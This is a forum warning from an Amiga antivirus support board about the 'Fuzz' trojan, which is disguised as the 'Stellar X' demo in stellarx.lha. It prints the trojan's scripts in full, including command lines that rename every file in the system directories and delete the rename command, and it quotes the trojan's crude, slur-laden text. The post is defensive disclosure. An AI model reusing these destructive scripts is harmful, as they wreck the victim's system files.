Virus Help Team
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Virus Help Team - Amiga Antivirus Support
 
HomeCalendarLatest imagesFAQSearchMemberlistUsergroupsRegisterLog in

Virus Help Team :: Virus Warnings
 

 Fuzz Trojan (stellarx.lha)

Go down 
AuthorMessage
Jan Andersen
Admin
Jan Andersen


Posts : 29
Join date : 2020-04-04
Location : Copenhagen, Denmark

Fuzz Trojan (stellarx.lha) Empty
PostSubject: Fuzz Trojan (stellarx.lha)   Fuzz Trojan (stellarx.lha) EmptySat Apr 11, 2020 5:46 am

Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE

Hi All....                                                              11 april 2020

We have just recived this archive. It is said to be a demo for ECS &
AGA machines. But if you run this demo, your Amiga system will in C:,
S:, Devs:, L; Libs:, will be renamed
   
We are not really sure how old this trojan are but at this time there
is NO ANTIVIRUS program that can find it. So watch out for it.
   
Here is some info about the trojan:
------------------------------------------------------
Trojan name: Fuzz
Trojan file: Many files do damage
Trojan size: Many files
Trojan archive: Stellarx.lha
Archive size: 444.898 bytes
Archive info: 'Stellar X' Demo - ECS & AGA Machines
------------------------------------------------------

There is an ReadMe.txt in the archive, with an add from a Canadian BBS,
called 'Peace Courier Canadian HQ', saying use a 14.4 USR Dual modem.
So we guess it must be an old trojan, there aint many BBS'es left

The trojan bomb is named 'Stellar X Demo'. When you start the Demo,
it looks like this:
Yo! Fuk-Dat-Boyee... UpTheAss
Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
navel creditz


The FuZZ trojan archive contains many other files:

  • BooYaKa (Script-File)
  • BooYaka.info (Icon)
  • DATA/Boyee (Rename Command)
  • DATA/Yo! (Run Command)
  • DATA/Fuk-Dat-Boyee... (CLI Show-Command Picture)
  • DATA/navel (Execute Command)
  • DATA/Fuk-Diz-Boyee... (Noiseplayer Music Player)
  • DATA/Wigger! (Soundmodule)
  • DATA/fuzzy (List Command)
  • DATA/creditz (ScriptFile)
  • DATA/Dude (Dir Command)
  • DATA/BooYaKa (Script File)
  • DATA/UpTheAss (Picture)

If you start the trojan, it executes the Script-File 'BooYaKa':

Where you can read this in the script:
cd data        
execute booyaka

This means that the trojan will execute the file
'DATA/BooYaKa'. This file contains:

Yo! Fuk-Dat-Boyee... UpTheAss
Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
navel creditz        

Now the trojan displays the picture 'UpTheAss'.
Then the module Wigger!.
And executes the script-file creditz:

fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ" navel rank
fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ" navel rank
fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ" navel rank
fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ" navel rank
fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ" navel rank
fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ" navel rank
delete c:rename

Now the trojan will rename every file in:
S:
C:
Fonts:
Libs:
L:
Devs:
And deletes the command c:rename

Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE


Regards....
Jan Andersen
Virus Help Denmark
www.vht-dk.dk
------------------
Back to top Go down
http://vht-dk.dk
 
Fuzz Trojan (stellarx.lha)
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Virus Help Team :: Virus Warnings-
Jump to: